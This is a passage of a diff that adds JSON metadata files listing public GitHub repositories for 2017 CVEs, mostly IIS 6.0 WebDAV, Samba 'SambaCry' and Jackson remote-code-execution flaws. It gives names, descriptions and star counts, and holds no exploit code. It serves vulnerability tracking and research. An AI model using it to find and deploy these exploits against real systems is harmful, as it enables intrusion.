"html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2017-7269", + "description": "Windows Server 2003 & IIS 6.0 - Remote Code Execution", + "fork": false, + "created_at": "2024-05-19T13:01:33Z", + "updated_at": "2024-06-24T08:07:52Z", + "pushed_at": "2024-06-24T08:05:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2017-7269", + "pentesting", + "remote-code-execution", + "vapt", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 839459028, + "name": "CVE-2017-7269", + "full_name": "VanishedPeople\/CVE-2017-7269", + "owner": { + "login": "VanishedPeople", + "id": 155242438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155242438?v=4", + "html_url": "https:\/\/github.com\/VanishedPeople", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VanishedPeople\/CVE-2017-7269", + "description": null, + "fork": false, + "created_at": "2024-08-07T16:45:02Z", + "updated_at": "2024-09-05T08:41:03Z", + "pushed_at": "2024-09-05T08:41:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 868559608, + "name": "CVE-2017-7269", + "full_name": "geniuszlyy\/CVE-2017-7269", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2017-7269", + "description": "is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6", + "fork": false, + "created_at": "2024-10-06T17:33:11Z", + "updated_at": "2024-10-21T08:15:02Z", + "pushed_at": "2024-10-07T17:34:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868725726, + "name": "CVE-2017-7269", + "full_name": "AxthonyV\/CVE-2017-7269", + "owner": { + "login": "AxthonyV", + "id": 141282212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141282212?v=4", + "html_url": "https:\/\/github.com\/AxthonyV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AxthonyV\/CVE-2017-7269", + "description": "PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.", + "fork": false, + "created_at": "2024-10-07T04:27:58Z", + "updated_at": "2024-10-07T16:22:07Z", + "pushed_at": "2024-10-07T04:28:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7308.json b/2017/CVE-2017-7308.json new file mode 100644 index 0000000000..719534a87e --- /dev/null +++ b/2017/CVE-2017-7308.json @@ -0,0 +1,33 @@ +[ + { + "id": 586817422, + "name": "CVE-2017-7308", + "full_name": "anldori\/CVE-2017-7308", + "owner": { + "login": "anldori", + "id": 101538840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4", + "html_url": "https:\/\/github.com\/anldori", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anldori\/CVE-2017-7308", + "description": "CVE-2017-7308 POC", + "fork": false, + "created_at": "2023-01-09T09:55:20Z", + "updated_at": "2023-01-09T09:55:40Z", + "pushed_at": "2023-01-09T09:56:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7358.json b/2017/CVE-2017-7358.json new file mode 100644 index 0000000000..7773f40403 --- /dev/null +++ b/2017/CVE-2017-7358.json @@ -0,0 +1,33 @@ +[ + { + "id": 606400096, + "name": "CVE-2017-7358", + "full_name": "JonPichel\/CVE-2017-7358", + "owner": { + "login": "JonPichel", + "id": 47296456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47296456?v=4", + "html_url": "https:\/\/github.com\/JonPichel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JonPichel\/CVE-2017-7358", + "description": null, + "fork": false, + "created_at": "2023-02-25T11:28:44Z", + "updated_at": "2023-02-25T11:29:36Z", + "pushed_at": "2023-02-25T12:00:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7374.json b/2017/CVE-2017-7374.json new file mode 100644 index 0000000000..ed811fe27a --- /dev/null +++ b/2017/CVE-2017-7374.json @@ -0,0 +1,33 @@ +[ + { + "id": 123190167, + "name": "cve-2017-7374", + "full_name": "ww9210\/cve-2017-7374", + "owner": { + "login": "ww9210", + "id": 5433111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5433111?v=4", + "html_url": "https:\/\/github.com\/ww9210", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ww9210\/cve-2017-7374", + "description": null, + "fork": false, + "created_at": "2018-02-27T21:22:01Z", + "updated_at": "2019-10-26T03:49:51Z", + "pushed_at": "2018-02-27T21:25:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7376.json b/2017/CVE-2017-7376.json new file mode 100644 index 0000000000..d7c496c1a3 --- /dev/null +++ b/2017/CVE-2017-7376.json @@ -0,0 +1,33 @@ +[ + { + "id": 271474290, + "name": "libxml2-exploit", + "full_name": "brahmstaedt\/libxml2-exploit", + "owner": { + "login": "brahmstaedt", + "id": 66769781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66769781?v=4", + "html_url": "https:\/\/github.com\/brahmstaedt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brahmstaedt\/libxml2-exploit", + "description": "An example exploit for CVE-2017-7376", + "fork": false, + "created_at": "2020-06-11T06:55:32Z", + "updated_at": "2023-05-04T13:51:57Z", + "pushed_at": "2020-06-11T10:02:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7410.json b/2017/CVE-2017-7410.json new file mode 100644 index 0000000000..30050f378a --- /dev/null +++ b/2017/CVE-2017-7410.json @@ -0,0 +1,33 @@ +[ + { + "id": 707810733, + "name": "CVE-2017-7410", + "full_name": "ashangp923\/CVE-2017-7410", + "owner": { + "login": "ashangp923", + "id": 133530110, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133530110?v=4", + "html_url": "https:\/\/github.com\/ashangp923", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ashangp923\/CVE-2017-7410", + "description": "To exploit SQL injection vulnerability", + "fork": false, + "created_at": "2023-10-20T17:58:28Z", + "updated_at": "2024-05-06T14:26:57Z", + "pushed_at": "2024-05-06T14:26:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7472.json b/2017/CVE-2017-7472.json new file mode 100644 index 0000000000..133cd67b25 --- /dev/null +++ b/2017/CVE-2017-7472.json @@ -0,0 +1,33 @@ +[ + { + "id": 93704978, + "name": "CVE-2017-7472", + "full_name": "homjxi0e\/CVE-2017-7472", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-7472", + "description": null, + "fork": false, + "created_at": "2017-06-08T03:47:57Z", + "updated_at": "2017-06-08T03:52:03Z", + "pushed_at": "2017-06-08T03:52:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7494.json b/2017/CVE-2017-7494.json new file mode 100644 index 0000000000..4baef57b36 --- /dev/null +++ b/2017/CVE-2017-7494.json @@ -0,0 +1,504 @@ +[ + { + "id": 92405414, + "name": "cve-2017-7494", + "full_name": "betab0t\/cve-2017-7494", + "owner": { + "login": "betab0t", + "id": 40000473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40000473?v=4", + "html_url": "https:\/\/github.com\/betab0t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/betab0t\/cve-2017-7494", + "description": "Proof-of-Concept exploit for CVE-2017-7494(Samba RCE from a writable share)", + "fork": false, + "created_at": "2017-05-25T13:20:56Z", + "updated_at": "2024-11-14T16:55:11Z", + "pushed_at": "2017-07-26T13:07:51Z", + "stargazers_count": 178, + "watchers_count": 178, + "has_discussions": false, + "forks_count": 59, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 59, + "watchers": 178, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 92410132, + "name": "CVE-2017-7494", + "full_name": "homjxi0e\/CVE-2017-7494", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-7494", + "description": null, + "fork": false, + "created_at": "2017-05-25T14:13:10Z", + "updated_at": "2017-05-26T08:46:45Z", + "pushed_at": "2017-05-26T08:46:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 92457464, + "name": "exploit-CVE-2017-7494", + "full_name": "opsxcq\/exploit-CVE-2017-7494", + "owner": { + "login": "opsxcq", + "id": 16995025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16995025?v=4", + "html_url": "https:\/\/github.com\/opsxcq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/opsxcq\/exploit-CVE-2017-7494", + "description": "SambaCry exploit and vulnerable container (CVE-2017-7494)", + "fork": false, + "created_at": "2017-05-26T00:58:25Z", + "updated_at": "2024-11-15T10:25:31Z", + "pushed_at": "2022-12-27T20:25:09Z", + "stargazers_count": 379, + "watchers_count": 379, + "has_discussions": false, + "forks_count": 100, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "linux", + "rce", + "samba", + "sambacry" + ], + "visibility": "public", + "forks": 100, + "watchers": 379, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 92484269, + "name": "SambaCry", + "full_name": "Waffles-2\/SambaCry", + "owner": { + "login": "Waffles-2", + "id": 21175535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21175535?v=4", + "html_url": "https:\/\/github.com\/Waffles-2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Waffles-2\/SambaCry", + "description": "CVE-2017-7494 - Detection Scripts", + "fork": false, + "created_at": "2017-05-26T07:28:26Z", + "updated_at": "2024-08-12T19:30:08Z", + "pushed_at": "2017-05-26T07:43:02Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 63, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 92845566, + "name": "SambaHunter", + "full_name": "brianwrf\/SambaHunter", + "owner": { + "login": "brianwrf", + "id": 8141813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8141813?v=4", + "html_url": "https:\/\/github.com\/brianwrf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brianwrf\/SambaHunter", + "description": "It is a simple script to exploit RCE for Samba (CVE-2017-7494 ).", + "fork": false, + "created_at": "2017-05-30T15:08:32Z", + "updated_at": "2024-08-12T19:30:12Z", + "pushed_at": "2021-10-31T07:06:25Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 55, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 93424064, + "name": "CVE-2017-7494", + "full_name": "joxeankoret\/CVE-2017-7494", + "owner": { + "login": "joxeankoret", + "id": 2945834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2945834?v=4", + "html_url": "https:\/\/github.com\/joxeankoret", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joxeankoret\/CVE-2017-7494", + "description": "Remote root exploit for the SAMBA CVE-2017-7494 vulnerability", + "fork": false, + "created_at": "2017-06-05T16:25:57Z", + "updated_at": "2024-10-28T18:13:54Z", + "pushed_at": "2021-03-09T09:12:55Z", + "stargazers_count": 256, + "watchers_count": 256, + "has_discussions": false, + "forks_count": 80, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 80, + "watchers": 256, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 98615757, + "name": "Samba-CVE-2017-7494", + "full_name": "Zer0d0y\/Samba-CVE-2017-7494", + "owner": { + "login": "Zer0d0y", + "id": 7157524, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7157524?v=4", + "html_url": "https:\/\/github.com\/Zer0d0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zer0d0y\/Samba-CVE-2017-7494", + "description": "搭建漏洞利用测试环境", + "fork": false, + "created_at": "2017-07-28T06:21:29Z", + "updated_at": "2018-07-16T17:13:02Z", + "pushed_at": "2018-03-28T14:30:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 132869660, + "name": "CVE-2017-7494", + "full_name": "incredible1yu\/CVE-2017-7494", + "owner": { + "login": "incredible1yu", + "id": 39152132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39152132?v=4", + "html_url": "https:\/\/github.com\/incredible1yu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/incredible1yu\/CVE-2017-7494", + "description": "CVE-2017-7494 C poc", + "fork": false, + "created_at": "2018-05-10T08:12:31Z", + "updated_at": "2018-05-10T08:29:03Z", + "pushed_at": "2018-05-10T08:29:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 164356178, + "name": "cve-2017-7494", + "full_name": "cved-sources\/cve-2017-7494", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-7494", + "description": "cve-2017-7494", + "fork": false, + "created_at": "2019-01-06T23:58:26Z", + "updated_at": "2021-04-15T21:26:56Z", + "pushed_at": "2021-04-15T21:26:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 230847942, + "name": "cve-2017-7494", + "full_name": "john-80\/cve-2017-7494", + "owner": { + "login": "john-80", + "id": 56648294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56648294?v=4", + "html_url": "https:\/\/github.com\/john-80", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/john-80\/cve-2017-7494", + "description": "samba 4.5.9 ", + "fork": false, + "created_at": "2019-12-30T04:33:39Z", + "updated_at": "2019-12-30T04:40:27Z", + "pushed_at": "2019-12-30T04:40:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 262877224, + "name": "CVE-2017-7494_IT19115344", + "full_name": "Hansindu-M\/CVE-2017-7494_IT19115344", + "owner": { + "login": "Hansindu-M", + "id": 61462694, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61462694?v=4", + "html_url": "https:\/\/github.com\/Hansindu-M", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hansindu-M\/CVE-2017-7494_IT19115344", + "description": "A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root.", + "fork": false, + "created_at": "2020-05-10T21:17:55Z", + "updated_at": "2020-05-11T11:32:16Z", + "pushed_at": "2020-05-11T11:32:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 365651593, + "name": "noSAMBAnoCRY-CVE-2017-7494", + "full_name": "0xm4ud\/noSAMBAnoCRY-CVE-2017-7494", + "owner": { + "login": "0xm4ud", + "id": 56730389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56730389?v=4", + "html_url": "https:\/\/github.com\/0xm4ud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xm4ud\/noSAMBAnoCRY-CVE-2017-7494", + "description": "CVE-2017-7494 python exploit", + "fork": false, + "created_at": "2021-05-09T02:32:54Z", + "updated_at": "2024-02-26T10:49:12Z", + "pushed_at": "2021-08-27T10:16:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 367561413, + "name": "BIT-EternalBlue-for-macOS_Linux", + "full_name": "I-Rinka\/BIT-EternalBlue-for-macOS_Linux", + "owner": { + "login": "I-Rinka", + "id": 50841088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50841088?v=4", + "html_url": "https:\/\/github.com\/I-Rinka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/I-Rinka\/BIT-EternalBlue-for-macOS_Linux", + "description": "Exploit CVE-2017-7494 for Net Security course final Assignment. This would reveal the vulnerability of services that run in administrative priority on Linux.", + "fork": false, + "created_at": "2021-05-15T06:52:23Z", + "updated_at": "2022-12-10T03:15:39Z", + "pushed_at": "2021-05-18T06:35:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 411821114, + "name": "-CVE-2017-7494-Samba-Exploit-POC", + "full_name": "adjaliya\/-CVE-2017-7494-Samba-Exploit-POC", + "owner": { + "login": "adjaliya", + "id": 74622486, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74622486?v=4", + "html_url": "https:\/\/github.com\/adjaliya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adjaliya\/-CVE-2017-7494-Samba-Exploit-POC", + "description": "According to researchers with Rapid7, over 110,000 devices appear on internet, which run stable Samba versions, while 92,500 seem to run unstable Samba versions, for which there is no fix. The newest Samba models, including the models 4.6.x before 4.6.4, 4.5.x before 4.5.10 and 3.5.0 before 4.4.13, was impacted by this error. May 24, 2017, Samba released version 4.6.4, which fixes a serious remote code execution vulnerability, vulnerability number CVE-2017-7494, which affected Samba 3.5.0 onwards. Vulnerability number: CVE-2017-7494 Severity Rating: High Affected software: • Samba Version < 4.6.4 • Samba Version < 4.5.10 • Samba Version < 4.4.14 Unaffected software: • Samba Version = 4.6.4 • Samba Version = 4.5.10 • Samba Version = 4.4.14", + "fork": false, + "created_at": "2021-09-29T20:31:20Z", + "updated_at": "2022-07-21T06:02:23Z", + "pushed_at": "2021-09-29T20:35:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497645433, + "name": "exploit-CVE-2017-7494", + "full_name": "00mjk\/exploit-CVE-2017-7494", + "owner": { + "login": "00mjk", + "id": 73543858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73543858?v=4", + "html_url": "https:\/\/github.com\/00mjk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/00mjk\/exploit-CVE-2017-7494", + "description": "SambaCry exploit (CVE-2017-7494) ", + "fork": false, + "created_at": "2022-05-29T16:27:13Z", + "updated_at": "2023-05-17T13:34:41Z", + "pushed_at": "2022-05-08T09:02:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 560631661, + "name": "CVE-2017-7494_SambaCry", + "full_name": "d3fudd\/CVE-2017-7494_SambaCry", + "owner": { + "login": "d3fudd", + "id": 76706456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76706456?v=4", + "html_url": "https:\/\/github.com\/d3fudd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3fudd\/CVE-2017-7494_SambaCry", + "description": "SambaCry (CVE-2017-7494) exploit for Samba | bind shell without Metasploit", + "fork": false, + "created_at": "2022-11-01T23:17:25Z", + "updated_at": "2023-12-05T00:06:40Z", + "pushed_at": "2022-11-01T23:53:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-75.json b/2017/CVE-2017-75.json new file mode 100644 index 0000000000..2bd82b0d47 --- /dev/null +++ b/2017/CVE-2017-75.json @@ -0,0 +1,33 @@ +[ + { + "id": 716695089, + "name": "EXP-CVE-2017-75", + "full_name": "CalebFIN\/EXP-CVE-2017-75", + "owner": { + "login": "CalebFIN", + "id": 136882798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136882798?v=4", + "html_url": "https:\/\/github.com\/CalebFIN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CalebFIN\/EXP-CVE-2017-75", + "description": "CVE-2017-7529- Check and EXPLOIT", + "fork": false, + "created_at": "2023-11-09T17:13:30Z", + "updated_at": "2024-08-20T23:55:34Z", + "pushed_at": "2024-05-01T17:53:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7504.json b/2017/CVE-2017-7504.json new file mode 100644 index 0000000000..269181b5b7 --- /dev/null +++ b/2017/CVE-2017-7504.json @@ -0,0 +1,33 @@ +[ + { + "id": 891560840, + "name": "CVE-2017-7504-poc", + "full_name": "wudidwo\/CVE-2017-7504-poc", + "owner": { + "login": "wudidwo", + "id": 121968635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121968635?v=4", + "html_url": "https:\/\/github.com\/wudidwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wudidwo\/CVE-2017-7504-poc", + "description": null, + "fork": false, + "created_at": "2024-11-20T14:53:25Z", + "updated_at": "2024-11-20T14:55:11Z", + "pushed_at": "2024-11-20T14:55:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7525.json b/2017/CVE-2017-7525.json new file mode 100644 index 0000000000..e7458f79e5 --- /dev/null +++ b/2017/CVE-2017-7525.json @@ -0,0 +1,199 @@ +[ + { + "id": 113026595, + "name": "study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095", + "full_name": "SecureSkyTechnology\/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095", + "owner": { + "login": "SecureSkyTechnology", + "id": 9350349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9350349?v=4", + "html_url": "https:\/\/github.com\/SecureSkyTechnology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecureSkyTechnology\/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095", + "description": "Struts2の脆弱性S2-045, S2-055 および Jackson の脆弱性 CVE-2017-7525, CVE-2017-15095 の調査報告", + "fork": false, + "created_at": "2017-12-04T10:07:28Z", + "updated_at": "2024-08-12T19:34:31Z", + "pushed_at": "2017-12-13T03:34:56Z", + "stargazers_count": 107, + "watchers_count": 107, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "jackson2", + "security-vulnerability", + "struts2" + ], + "visibility": "public", + "forks": 21, + "watchers": 107, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 114703214, + "name": "S2-055", + "full_name": "Nazicc\/S2-055", + "owner": { + "login": "Nazicc", + "id": 12894927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12894927?v=4", + "html_url": "https:\/\/github.com\/Nazicc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nazicc\/S2-055", + "description": "CVE-2017-7525 S2-055 Exploit", + "fork": false, + "created_at": "2017-12-19T01:02:04Z", + "updated_at": "2024-03-05T15:08:39Z", + "pushed_at": "2017-12-18T10:26:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 167006781, + "name": "Demo-Exploit-Jackson-RCE", + "full_name": "JavanXD\/Demo-Exploit-Jackson-RCE", + "owner": { + "login": "JavanXD", + "id": 4342160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4342160?v=4", + "html_url": "https:\/\/github.com\/JavanXD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JavanXD\/Demo-Exploit-Jackson-RCE", + "description": "Exploiting CVE-2017-7525 demo project with Angular7 frontend and Spring.", + "fork": false, + "created_at": "2019-01-22T14:19:54Z", + "updated_at": "2024-07-03T08:07:54Z", + "pushed_at": "2019-02-21T13:18:24Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 229002257, + "name": "jackson-RCE", + "full_name": "BassinD\/jackson-RCE", + "owner": { + "login": "BassinD", + "id": 29598797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29598797?v=4", + "html_url": "https:\/\/github.com\/BassinD", + "user_view_type": "public" + }, + 